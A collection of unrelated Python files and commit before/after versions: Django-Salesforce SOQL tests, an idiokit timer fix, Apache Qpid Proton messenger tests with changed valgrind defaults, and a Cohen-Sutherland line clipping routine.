timestamp= timestamp.replace(tzinfo=pytz.utc)
return timestamp
class BasicSOQLTest(TestCase):
def setUp(self):
"""
Create our test lead record.
"""
self.test_lead = Lead(
FirstName = "User",
LastName = "Unittest General",
Email = test_email,
Status = 'Open',
Company = "Some company, Ltd.",
)
self.test_lead.save()
def tearDown(self):
"""
Clean up our test lead record.
"""
self.test_lead.delete()
def test_raw(self):
"""
Get the first two contact records.
"""
contacts = Contact.objects.raw(
"SELECT Id, LastName, FirstName FROM Contact "
"LIMIT 2")
self.assertEqual(len(contacts), 2)
'%s' % contacts[0].__dict__ # Check that all fields are accessible
def test_raw_foreignkey_id(self):
"""
Get the first two contacts by raw query with a ForeignKey id field.
"""
contacts = Contact.objects.raw(
"SELECT Id, LastName, FirstName, OwnerId FROM Contact "
"LIMIT 2")
self.assertEqual(len(contacts), 2)
'%s' % contacts[0].__dict__ # Check that all fields are accessible
self.assertIn('@', contacts[0].Owner.Email)
def test_select_all(self):
"""
Get the first two contact records.
"""
contacts = Contact.objects.all()[0:2]
self.assertEqual(len(contacts), 2)
def test_exclude_query_construction(self):
"""
Test that exclude query construction returns valid SOQL.
"""
contacts = Contact.objects.filter(FirstName__isnull=False).exclude(Email="steve@apple.com", LastName="Wozniak").exclude(LastName="smith")
number_of_contacts = contacts.count()
self.assertIsInstance(number_of_contacts, int)
def test_foreign_key(self):
"""
Verify that the owner of an Contact is the currently logged admin.
"""
contact = Contact.objects.all()[0]
user = contact.Owner
# This user can be e.g. 'admins@freelancersunion.org.prod001'.
self.assertEqual(user.Username, current_user)
def test_update_date(self):
"""
Test updating a date.
"""
now = round_datetime_utc(datetime.datetime.utcnow())
contact = Contact.objects.all()[0]
old_date = contact.EmailBouncedDate
contact.EmailBouncedDate = now.replace(tzinfo=pytz.utc)
contact.save()
try:
self.assertEqual(refresh(contact).EmailBouncedDate, now)
finally:
contact.EmailBouncedDate = old_date
contact.save()
self.assertEqual(refresh(contact).EmailBouncedDate, old_date)
def test_insert_date(self):
"""
Test inserting a date.
"""
now = round_datetime_utc(datetime.datetime.utcnow())
contact = Contact(
FirstName = 'Joe',
LastName = 'Freelancer',
EmailBouncedDate=now.replace(tzinfo=pytz.utc))
contact.save()
try:
self.assertEqual(refresh(contact).EmailBouncedDate, now)
finally:
contact.delete()
def test_default_specified_by_sf(self):
"""
Verify that an object with a field with default value specified by some
Salesforce code can be inserted. (The default is used only for a field
unspecified in SF REST API, but not for None or any similar value.
It was a pain for some unimportant foreign keys that don't accept null.
"""
# Verify a smart default is used.
contact = Contact(FirstName = 'sf_test', LastName='my')
contact.save()
try:
self.assertEqual(refresh(contact).Owner.Username, current_user)
finally:
contact.delete()
# Verify that an explicit value is possible for this field.
other_user_obj = User.objects.exclude(Username=current_user)[0]
contact = Contact(FirstName = 'sf_test', LastName='your',
Owner=other_user_obj)
contact.save()
try:
self.assertEqual(
refresh(contact).Owner.Username, other_user_obj.Username)
finally:
contact.delete()
def test_get(self):
"""
Get the test lead record.
"""
lead = Lead.objects.get(Email=test_email)
self.assertEqual(lead.FirstName, 'User')
self.assertEqual(lead.LastName, 'Unittest General')
# test a read only field (formula of full name)
self.assertEqual(lead.Name, 'User Unittest General')
def test_not_null(self):
"""
Get the test lead record by isnull condition.
"""
# TODO similar failed: Contact.objects.filter(Account__isnull=True)
# passed: Contact.objects.filter(Account=None)
lead = Lead.objects.get(Email__isnull=False, FirstName='User')
self.assertEqual(lead.FirstName, 'User')
self.assertEqual(lead.LastName, 'Unittest General')
def test_unicode(self):
"""
Make sure weird unicode breaks properly.
"""
test_lead = Lead(FirstName=u'\u2603', LastName="Unittest Unicode",
Email='test-djsf-unicode-email@example.com',
Company="Some company")
test_lead.save()
try:
self.assertEqual(refresh(test_lead).FirstName, u'\u2603')
finally:
test_lead.delete()
def test_date_comparison(self):
"""
Test that date comparisons work properly.
"""
today = round_datetime_utc(datetime.datetime(2013, 8, 27))
yesterday = today - datetime.timedelta(days=1)
tomorrow = today + datetime.timedelta(days=1)
contact = Contact(FirstName='sf_test', LastName='date',
EmailBouncedDate=today)
contact.save()
try:
contacts1 = Contact.objects.filter(EmailBouncedDate__gt=yesterday)
self.assertEqual(len(contacts1), 1)
contacts2 = Contact.objects.filter(EmailBouncedDate__gt=tomorrow)
self.assertEqual(len(contacts2), 0)
finally:
contact.delete()
def test_insert(self):
"""
Create a lead record, and make sure it ends up with a valid Salesforce ID.
"""
test_lead = Lead(FirstName="User", LastName="Unittest Inserts",
Email='test-djsf-inserts-email@example.com',
Company="Some company")
test_lead.save()
try:
self.assertEqual(len(test_lead.pk), 18)
finally:
test_lead.delete()
def test_delete(self):
"""
Create a lead record, then delete it, and make sure it's gone.
"""
test_lead = Lead(FirstName="User", LastName="Unittest Deletes",
Email='test-djsf-delete-email@example.com',
Company="Some company")
test_lead.save()
test_lead.delete()
self.assertRaises(Lead.DoesNotExist, Lead.objects.get, Email='test-djsf-delete-email@example.com')
def test_update(self):
"""
Update the test lead record.
"""
test_lead = Lead.objects.get(Email=test_email)
self.assertEquals(test_lead.FirstName, 'User')
test_lead.FirstName = 'Tested'
test_lead.save()
self.assertEqual(refresh(test_lead).FirstName, 'Tested')
def test_custom_objects(self):
"""
Make sure custom objects work.
"""
if not 'ChargentOrders__ChargentOrder__c' in sf_tables:
self.skipTest('Not found custom tables ChargentOrders__*')
orders = ChargentOrder.objects.all()[0:5]
self.assertEqual(len(orders), 5)
def test_custom_object_general(self):
"""
Create, read and delete any general custom object.
Object name and field name are user configurable by TEST_CUSTOM_FIELD.
"""
table_list_cache = connections['salesforce'].introspection.table_list_cache
table_names = [x['name'] for x in table_list_cache['sobjects']]
if not test_custom_db_table in sf_tables:
self.skipTest("Not found the expected custom object '%s'" %
test_custom_db_table)
obj = GeneralCustomModel(GeneralCustomField='sf_test')
obj.save()
try:
results = GeneralCustomModel.objects.all()[0:1]
self.assertEqual(len(results), 1)
self.assertEqual(results[0].GeneralCustomField, 'sf_test')
finally:
obj.delete()
def test_datetime_miliseconds(self):
"""
Verify that a field with milisecond resolution is readable.
"""
trigger = CronTrigger.objects.all()[0]
self.assertTrue(isinstance(trigger.PreviousFireTime, datetime.datetime))
# The reliability of this is only 99.9%, therefore it is commented out.
#self.assertNotEqual(trigger.PreviousFireTime.microsecond, 0)
def test_time_field(self):
"""
Test a TimeField (read, modify, verify).
"""
obj_orig = BusinessHours.objects.all()[0]
obj = refresh(obj_orig)
self.assertTrue(isinstance(obj.MondayStartTime, datetime.time))
obj.MondayStartTime = datetime.time(23, 59)
obj.save()
obj = refresh(obj)
try:
self.assertEqual(obj.MondayStartTime, datetime.time(23, 59))
finally:
obj_orig.save()
def test_account_insert_delete(self):
"""
Test insert and delete an account (normal or personal SF config)
"""
if settings.PERSON_ACCOUNT_ACTIVATED:
test_account = Account(FirstName='IntegrationTest',
LastName='Account')
else:
test_account = Account(Name='IntegrationTest Account')
test_account.save()
try:
accounts = Account.objects.filter(Name='IntegrationTest Account')
self.assertEqual(len(accounts), 1)
finally:
test_account.delete()
def test_similarity_filter_operators(self):
"""
Test filter operators that use LIKE 'something%' and similar.
"""
User.objects.get(Username__exact=current_user)
User.objects.get(Username__iexact=current_user.upper())
User.objects.get(Username__contains=current_user[1:-1])
User.objects.get(Username__icontains=current_user[1:-1].upper())
User.objects.get(Username__startswith=current_user[:-1])
User.objects.get(Username__istartswith=current_user[:-1].upper())
User.objects.get(Username__endswith=current_user[1:])
User.objects.get(Username__iendswith=current_user[1:].upper())
# Operators regex and iregex not tested because they are not supported.
def test_unsupported_bulk_create(self):
"""
Unsupported bulk_create: "Errors should never pass silently."
"""
if not DJANGO_14:
self.skipTest('Django 1.3 has no bulk operations.')
objects = [Contact(LastName='sf_test a'), Contact(LastName='sf_test b')]
self.assertRaises(AssertionError, Contact.objects.bulk_create, objects)
def test_escape_single_quote(self):
"""
Test that single quotes in strings used in filtering a QuerySet
are escaped properly.
"""
account_name = '''Dr. Evil's Giant "Laser", LLC'''
account = Account(Name=account_name)
account.save()
try:
self.assertTrue(Account.objects.filter(Name=account_name).exists())
finally:
account.delete()
|
from __future__ import absolute_import
from functools import partial
from . import idiokit
from ._selectloop import cancel as selectloop_cancel, sleep as selectloop_sleep
def _cancel(node, _):
selectloop_cancel(node)
def sleep(delay):
event = idiokit.Event()
node = selectloop_sleep(delay, event.succeed)
event.result().unsafe_listen(partial(_cancel, node))
return event
class Timeout(Exception):
pass
def timeout(timeout, stream=None, throw=Timeout()):
if stream is None:
stream = idiokit.Event()
node = selectloop_sleep(timeout, stream.throw, throw)
stream.result().unsafe_listen(partial(_cancel, node))
return stream
idiokit.timer: Fix, use threadsafe Value.listen calls.
--HG--
branch : new-selectloop
from __future__ import absolute_import
from functools import partial
from . import idiokit
from ._selectloop import cancel as selectloop_cancel, sleep as selectloop_sleep
def _cancel(node, _):
selectloop_cancel(node)
def sleep(delay):
event = idiokit.Event()
node = selectloop_sleep(delay, event.succeed)
event.result().listen(partial(_cancel, node))
return event
class Timeout(Exception):
pass
def timeout(timeout, stream=None, throw=Timeout()):
if stream is None:
stream = idiokit.Event()
node = selectloop_sleep(timeout, stream.throw, throw)
stream.result().listen(partial(_cancel, node))
return stream
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import sys
from common import Test, Skipped, free_tcp_ports, \
MessengerReceiverC, MessengerSenderC, \
MessengerReceiverValgrind, MessengerSenderValgrind, \
MessengerReceiverPython, MessengerSenderPython, \
isSSLPresent
from proton import *
#
# Tests that run the apps
#
class AppTests(Test):
def __init__(self, *args):
Test.__init__(self, *args)
self.is_valgrind = False
def default(self, name, value, **kwargs):
if self.is_valgrind:
default = kwargs.get("valgrind", value)
else:
default = value
return Test.default(self, name, default, **kwargs)
@property
def iterations(self):
return int(self.default("iterations", 2, fast=1, valgrind=1))
@property
def send_count(self):
return int(self.default("send_count", 17, fast=1, valgrind=1))
@property
def target_count(self):
return int(self.default("target_count", 5, fast=1, valgrind=1))
@property
def send_batch(self):
return int(self.default("send_batch", 7, fast=1, valgrind=1))
@property
def forward_count(self):
return int(self.default("forward_count", 5, fast=1, valgrind=1))
@property
def port_count(self):
return int(self.default("port_count", 3, fast=1, valgrind=1))
@property
def sender_count(self):
return int(self.default("sender_count", 3, fast=1, valgrind=1))
def valgrind_test(self):
self.is_valgrind = True
def setup(self):
self.senders = []
self.receivers = []
def teardown(self):
pass
def _do_test(self, iterations=1):
verbose = self.verbose
for R in self.receivers:
R.start( verbose )
for j in range(iterations):
for S in self.senders:
S.start( verbose )
for S in self.senders:
S.wait()
#print("SENDER OUTPUT:")
#print( S.stdout() )
assert S.status() == 0, ("Command '%s' failed status=%d: '%s' '%s'"
% (str(S.cmdline()),
S.status(),
S.stdout(),
S.stderr()))
for R in self.receivers:
R.wait()
#print("RECEIVER OUTPUT")
#print( R.stdout() )
assert R.status() == 0, ("Command '%s' failed status=%d: '%s' '%s'"
% (str(R.cmdline()),
R.status(),
R.stdout(),
R.stderr()))
#
# Traffic passing tests based on the Messenger apps
#
class MessengerTests(AppTests):
_timeout = 60
def _ssl_check(self):
if not isSSLPresent():
raise Skipped("No SSL libraries found.")
def __init__(self, *args):
AppTests.__init__(self, *args)
def _do_oneway_test(self, receiver, sender, domain="amqp"):
""" Send N messages to a receiver.
Parameters:
iterations - repeat the senders this many times
target_count = # of targets to send to.
send_count = # messages sent to each target
"""
iterations = self.iterations
send_count = self.send_count
target_count = self.target_count
send_total = send_count * target_count
receive_total = send_total * iterations
port = free_tcp_ports()[0]
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
receiver.receive_count = receive_total
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
sender.targets = ["%s://0.0.0.0:%s/X%d" % (domain, port, j) for j in range(target_count)]
sender.send_count = send_total
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def _do_echo_test(self, receiver, sender, domain="amqp"):
""" Send N messages to a receiver, which responds to each.
Parameters:
iterations - repeat the senders this many times
target_count - # targets to send to
send_count = # messages sent to each target
send_batch - wait for replies after this many messages sent
"""
iterations = self.iterations
send_count = self.send_count
target_count = self.target_count
send_batch = self.send_batch
send_total = send_count * target_count
receive_total = send_total * iterations
port = free_tcp_ports()[0]
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
receiver.receive_count = receive_total
receiver.send_reply = True
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
sender.targets = ["%s://0.0.0.0:%s/%dY" % (domain, port, j) for j in range(target_count)]
sender.send_count = send_total
sender.get_reply = True
sender.send_batch = send_batch
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def _do_relay_test(self, receiver, relay, sender, domain="amqp"):
""" Send N messages to a receiver, which replies to each and forwards
each of them to different receiver.
Parameters:
iterations - repeat the senders this many times
target_count - # targets to send to
send_count = # messages sent to each target
send_batch - wait for replies after this many messages sent
forward_count - forward to this many targets
"""
iterations = self.iterations
send_count = self.send_count
target_count = self.target_count
send_batch = self.send_batch
forward_count = self.forward_count
send_total = send_count * target_count
receive_total = send_total * iterations
port = free_tcp_ports()[0]
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
receiver.receive_count = receive_total
receiver.send_reply = True
# forward to 'relay' - uses two links
# ## THIS FAILS:
# receiver.forwards = ["amqp://Relay/%d" % j for j in range(forward_count)]
receiver.forwards = ["%s://Relay" % domain]
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
relay.subscriptions = ["%s://0.0.0.0:%s" % (domain, port)]
relay.name = "Relay"
relay.receive_count = receive_total
relay.timeout = MessengerTests._timeout
self.receivers.append( relay )
# send to 'receiver'
sender.targets = ["%s://0.0.0.0:%s/X%dY" % (domain, port, j) for j in range(target_count)]
sender.send_count = send_total
sender.get_reply = True
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def _do_star_topology_test(self, r_factory, s_factory, domain="amqp"):
"""
A star-like topology, with a central receiver at the hub, and senders at
the spokes. Each sender will connect to each of the ports the receiver is
listening on. Each sender will then create N links per each connection.
Each sender will send X messages per link, waiting for a response.
Parameters:
iterations - repeat the senders this many times
port_count - # of ports the receiver will listen on. Each sender connects
to all ports.
sender_count - # of senders
target_count - # of targets per connection
send_count - # of messages sent to each target
send_batch - # of messages to send before waiting for response
"""
iterations = self.iterations
port_count = self.port_count
sender_count = self.sender_count
target_count = self.target_count
send_count = self.send_count
send_batch = self.send_batch
send_total = port_count * target_count * send_count
receive_total = send_total * sender_count * iterations
ports = free_tcp_ports(port_count)
receiver = r_factory()
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port) for port in ports]
receiver.receive_count = receive_total
receiver.send_reply = True
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
for i in range(sender_count):
sender = s_factory()
sender.targets = ["%s://0.0.0.0:%s/%d" % (domain, port, j) for port in ports for j in range(target_count)]
sender.send_count = send_total
sender.send_batch = send_batch
sender.get_reply = True
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def test_oneway_C(self):
self._do_oneway_test(MessengerReceiverC(), MessengerSenderC())
def test_oneway_C_SSL(self):
self._ssl_check()
self._do_oneway_test(MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_oneway_valgrind(self):
self.valgrind_test()
self._do_oneway_test(MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_oneway_Python(self):
self._do_oneway_test(MessengerReceiverPython(), MessengerSenderPython())
def test_oneway_C_Python(self):
self._do_oneway_test(MessengerReceiverC(), MessengerSenderPython())
def test_oneway_Python_C(self):
self._do_oneway_test(MessengerReceiverPython(), MessengerSenderC())
def test_echo_C(self):
self._do_echo_test(MessengerReceiverC(), MessengerSenderC())
def test_echo_C_SSL(self):
self._ssl_check()
self._do_echo_test(MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_echo_valgrind(self):
self.valgrind_test()
self._do_echo_test(MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_echo_Python(self):
self._do_echo_test(MessengerReceiverPython(), MessengerSenderPython())
def test_echo_C_Python(self):
self._do_echo_test(MessengerReceiverC(), MessengerSenderPython())
def test_echo_Python_C(self):
self._do_echo_test(MessengerReceiverPython(), MessengerSenderC())
def test_relay_C(self):
self._do_relay_test(MessengerReceiverC(), MessengerReceiverC(), MessengerSenderC())
def test_relay_C_SSL(self):
self._ssl_check()
self._do_relay_test(MessengerReceiverC(), MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_relay_valgrind(self):
self.valgrind_test()
self._do_relay_test(MessengerReceiverValgrind(), MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_relay_C_Python(self):
self._do_relay_test(MessengerReceiverC(), MessengerReceiverPython(), MessengerSenderPython())
def test_relay_Python(self):
self._do_relay_test(MessengerReceiverPython(), MessengerReceiverPython(), MessengerSenderPython())
def test_star_topology_C(self):
self._do_star_topology_test( MessengerReceiverC, MessengerSenderC )
def test_star_topology_C_SSL(self):
self._ssl_check()
self._do_star_topology_test( MessengerReceiverC, MessengerSenderC, "amqps" )
def test_star_topology_valgrind(self):
self.valgrind_test()
self._do_star_topology_test( MessengerReceiverValgrind, MessengerSenderValgrind )
def test_star_topology_Python(self):
self._do_star_topology_test( MessengerReceiverPython, MessengerSenderPython )
def test_star_topology_Python_C(self):
self._do_star_topology_test( MessengerReceiverPython, MessengerSenderC )
def test_star_topology_C_Python(self):
self._do_star_topology_test( MessengerReceiverPython, MessengerSenderC )
NO-JIRA: bump up the default parameters to the valgrind tests for better code coverage.
git-svn-id: 33ed6c3feaacb64944efc691d1ae8e09b17f2bf9@1581989 13f79535-47bb-0310-9956-ffa450edef68
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import sys
from common import Test, Skipped, free_tcp_ports, \
MessengerReceiverC, MessengerSenderC, \
MessengerReceiverValgrind, MessengerSenderValgrind, \
MessengerReceiverPython, MessengerSenderPython, \
isSSLPresent
from proton import *
#
# Tests that run the apps
#
class AppTests(Test):
def __init__(self, *args):
Test.__init__(self, *args)
self.is_valgrind = False
def default(self, name, value, **kwargs):
if self.is_valgrind:
default = kwargs.get("valgrind", value)
else:
default = value
return Test.default(self, name, default, **kwargs)
@property
def iterations(self):
return int(self.default("iterations", 2, fast=1, valgrind=2))
@property
def send_count(self):
return int(self.default("send_count", 17, fast=1, valgrind=2))
@property
def target_count(self):
return int(self.default("target_count", 5, fast=1, valgrind=2))
@property
def send_batch(self):
return int(self.default("send_batch", 7, fast=1, valgrind=2))
@property
def forward_count(self):
return int(self.default("forward_count", 5, fast=1, valgrind=2))
@property
def port_count(self):
return int(self.default("port_count", 3, fast=1, valgrind=2))
@property
def sender_count(self):
return int(self.default("sender_count", 3, fast=1, valgrind=2))
def valgrind_test(self):
self.is_valgrind = True
def setup(self):
self.senders = []
self.receivers = []
def teardown(self):
pass
def _do_test(self, iterations=1):
verbose = self.verbose
for R in self.receivers:
R.start( verbose )
for j in range(iterations):
for S in self.senders:
S.start( verbose )
for S in self.senders:
S.wait()
#print("SENDER OUTPUT:")
#print( S.stdout() )
assert S.status() == 0, ("Command '%s' failed status=%d: '%s' '%s'"
% (str(S.cmdline()),
S.status(),
S.stdout(),
S.stderr()))
for R in self.receivers:
R.wait()
#print("RECEIVER OUTPUT")
#print( R.stdout() )
assert R.status() == 0, ("Command '%s' failed status=%d: '%s' '%s'"
% (str(R.cmdline()),
R.status(),
R.stdout(),
R.stderr()))
#
# Traffic passing tests based on the Messenger apps
#
class MessengerTests(AppTests):
_timeout = 60
def _ssl_check(self):
if not isSSLPresent():
raise Skipped("No SSL libraries found.")
def __init__(self, *args):
AppTests.__init__(self, *args)
def _do_oneway_test(self, receiver, sender, domain="amqp"):
""" Send N messages to a receiver.
Parameters:
iterations - repeat the senders this many times
target_count = # of targets to send to.
send_count = # messages sent to each target
"""
iterations = self.iterations
send_count = self.send_count
target_count = self.target_count
send_total = send_count * target_count
receive_total = send_total * iterations
port = free_tcp_ports()[0]
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
receiver.receive_count = receive_total
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
sender.targets = ["%s://0.0.0.0:%s/X%d" % (domain, port, j) for j in range(target_count)]
sender.send_count = send_total
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def _do_echo_test(self, receiver, sender, domain="amqp"):
""" Send N messages to a receiver, which responds to each.
Parameters:
iterations - repeat the senders this many times
target_count - # targets to send to
send_count = # messages sent to each target
send_batch - wait for replies after this many messages sent
"""
iterations = self.iterations
send_count = self.send_count
target_count = self.target_count
send_batch = self.send_batch
send_total = send_count * target_count
receive_total = send_total * iterations
port = free_tcp_ports()[0]
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
receiver.receive_count = receive_total
receiver.send_reply = True
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
sender.targets = ["%s://0.0.0.0:%s/%dY" % (domain, port, j) for j in range(target_count)]
sender.send_count = send_total
sender.get_reply = True
sender.send_batch = send_batch
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def _do_relay_test(self, receiver, relay, sender, domain="amqp"):
""" Send N messages to a receiver, which replies to each and forwards
each of them to different receiver.
Parameters:
iterations - repeat the senders this many times
target_count - # targets to send to
send_count = # messages sent to each target
send_batch - wait for replies after this many messages sent
forward_count - forward to this many targets
"""
iterations = self.iterations
send_count = self.send_count
target_count = self.target_count
send_batch = self.send_batch
forward_count = self.forward_count
send_total = send_count * target_count
receive_total = send_total * iterations
port = free_tcp_ports()[0]
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
receiver.receive_count = receive_total
receiver.send_reply = True
# forward to 'relay' - uses two links
# ## THIS FAILS:
# receiver.forwards = ["amqp://Relay/%d" % j for j in range(forward_count)]
receiver.forwards = ["%s://Relay" % domain]
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
relay.subscriptions = ["%s://0.0.0.0:%s" % (domain, port)]
relay.name = "Relay"
relay.receive_count = receive_total
relay.timeout = MessengerTests._timeout
self.receivers.append( relay )
# send to 'receiver'
sender.targets = ["%s://0.0.0.0:%s/X%dY" % (domain, port, j) for j in range(target_count)]
sender.send_count = send_total
sender.get_reply = True
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def _do_star_topology_test(self, r_factory, s_factory, domain="amqp"):
"""
A star-like topology, with a central receiver at the hub, and senders at
the spokes. Each sender will connect to each of the ports the receiver is
listening on. Each sender will then create N links per each connection.
Each sender will send X messages per link, waiting for a response.
Parameters:
iterations - repeat the senders this many times
port_count - # of ports the receiver will listen on. Each sender connects
to all ports.
sender_count - # of senders
target_count - # of targets per connection
send_count - # of messages sent to each target
send_batch - # of messages to send before waiting for response
"""
iterations = self.iterations
port_count = self.port_count
sender_count = self.sender_count
target_count = self.target_count
send_count = self.send_count
send_batch = self.send_batch
send_total = port_count * target_count * send_count
receive_total = send_total * sender_count * iterations
ports = free_tcp_ports(port_count)
receiver = r_factory()
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port) for port in ports]
receiver.receive_count = receive_total
receiver.send_reply = True
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
for i in range(sender_count):
sender = s_factory()
sender.targets = ["%s://0.0.0.0:%s/%d" % (domain, port, j) for port in ports for j in range(target_count)]
sender.send_count = send_total
sender.send_batch = send_batch
sender.get_reply = True
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def test_oneway_C(self):
self._do_oneway_test(MessengerReceiverC(), MessengerSenderC())
def test_oneway_C_SSL(self):
self._ssl_check()
self._do_oneway_test(MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_oneway_valgrind(self):
self.valgrind_test()
self._do_oneway_test(MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_oneway_Python(self):
self._do_oneway_test(MessengerReceiverPython(), MessengerSenderPython())
def test_oneway_C_Python(self):
self._do_oneway_test(MessengerReceiverC(), MessengerSenderPython())
def test_oneway_Python_C(self):
self._do_oneway_test(MessengerReceiverPython(), MessengerSenderC())
def test_echo_C(self):
self._do_echo_test(MessengerReceiverC(), MessengerSenderC())
def test_echo_C_SSL(self):
self._ssl_check()
self._do_echo_test(MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_echo_valgrind(self):
self.valgrind_test()
self._do_echo_test(MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_echo_Python(self):
self._do_echo_test(MessengerReceiverPython(), MessengerSenderPython())
def test_echo_C_Python(self):
self._do_echo_test(MessengerReceiverC(), MessengerSenderPython())
def test_echo_Python_C(self):
self._do_echo_test(MessengerReceiverPython(), MessengerSenderC())
def test_relay_C(self):
self._do_relay_test(MessengerReceiverC(), MessengerReceiverC(), MessengerSenderC())
def test_relay_C_SSL(self):
self._ssl_check()
self._do_relay_test(MessengerReceiverC(), MessengerReceiverC(), MessengerSenderC(), "amqps")
def test_relay_valgrind(self):
self.valgrind_test()
self._do_relay_test(MessengerReceiverValgrind(), MessengerReceiverValgrind(), MessengerSenderValgrind())
def test_relay_C_Python(self):
self._do_relay_test(MessengerReceiverC(), MessengerReceiverPython(), MessengerSenderPython())
def test_relay_Python(self):
self._do_relay_test(MessengerReceiverPython(), MessengerReceiverPython(), MessengerSenderPython())
def test_star_topology_C(self):
self._do_star_topology_test( MessengerReceiverC, MessengerSenderC )
def test_star_topology_C_SSL(self):
self._ssl_check()
self._do_star_topology_test( MessengerReceiverC, MessengerSenderC, "amqps" )
def test_star_topology_valgrind(self):
self.valgrind_test()
self._do_star_topology_test( MessengerReceiverValgrind, MessengerSenderValgrind )
def test_star_topology_Python(self):
self._do_star_topology_test( MessengerReceiverPython, MessengerSenderPython )
def test_star_topology_Python_C(self):
self._do_star_topology_test( MessengerReceiverPython, MessengerSenderC )
def test_star_topology_C_Python(self):
self._do_star_topology_test( MessengerReceiverPython, MessengerSenderC )
|
# -*- coding: utf-8 -*-
from __future__ import division
'''
forked from https://bitbucket.org/marcusva/py-sdl2 (which has public-domain license)
The MIT License (MIT)
Copyright (c) 2014 Michael Hirsch
reference: http://en.wikipedia.org/wiki/Cohen%E2%80%93Sutherland_algorithm
I have corrected errors in the cohensutherland code and compared cohensutherland with Matlab polyxpoly() results.
'''
def cohensutherland(xmin, ymax, xmax, ymin, x1, y1, x2, y2):
"""Clips a line to a rectangular area.
This implements the Cohen-Sutherland line clipping algorithm. xmin,
ymax, xmax and ymin denote the clipping area, into which the line
defined by x1, y1 (start point) and x2, y2 (end point) will be
clipped.
If the line does not intersect with the rectangular clipping area,
four None values will be returned as tuple. Otherwise a tuple of the
clipped line points will be returned in the form (cx1, cy1, cx2, cy2).
"""
INSIDE,LEFT, RIGHT, LOWER, UPPER = 0,1, 2, 4, 8
def _getclip(xa, ya):
#if dbglvl>1: print('point: '),; print(xa,ya)
p = INSIDE #default is inside
# consider x
if xa < xmin:
p |= LEFT
elif xa > xmax:
p |= RIGHT
# consider y
if ya < ymin:
p |= LOWER # bitwise OR
elif ya > ymax:
p |= UPPER #bitwise OR
return p
# check for trivially outside lines
k1 = _getclip(x1, y1)
k2 = _getclip(x2, y2)
# examine non-trivially outside points
while (k1 | k2) != 0: # if both points are inside box (0000) , ACCEPT trivial whole line in box
# if line trivially outside window, REJECT
if (k1 & k2) != 0:
#if dbglvl>1: print(' REJECT trivially outside box')
return None, None, None, None
#non-trivial case, at least one point outside window
opt = k1 or k2 # take first non-zero point, short circuit logic
if opt & UPPER:
x = x1 + (x2 - x1) * (ymax - y1) / (y2 - y1)
y = ymax
elif opt & LOWER:
x = x1 + (x2 - x1) * (ymin - y1) / (y2 - y1)
y = ymin
elif opt & RIGHT:
y = y1 + (y2 - y1) * (xmax - x1) / (x2 - x1)
x = xmax
elif opt & LEFT:
y = y1 + (y2 - y1) * (xmin - x1) / (x2 - x1)
x = xmin
else: raise RuntimeError('Undefined clipping state')
if opt == k1:
x1, y1 = x, y
k1 = _getclip(x1, y1)
#if dbglvl>1: print('checking k1: ' + str(x) + ',' + str(y) + ' ' + str(k1))
elif opt == k2:
#if dbglvl>1: print('checking k2: ' + str(x) + ',' + str(y) + ' ' + str(k2))
x2, y2 = x, y
k2 = _getclip(x2, y2)
return x1, y1, x2, y2
if __name__ == '__main__': #test case
from numpy.testing import assert_array_almost_equal
'''
make box with corners LL/UR (1,3) (4,5)
and line segment with ends (0,0) (4,6)
'''
x1, y1, x2, y2 = cohensutherland(1, 5, 4, 3,
0, 0, 4, 6)
assert_array_almost_equal([x1,y1,x2,y2],[2,3,3.3333333333333,5])
numba test
#!/usr/bin/env python3
from __future__ import division
#nan = float('nan')
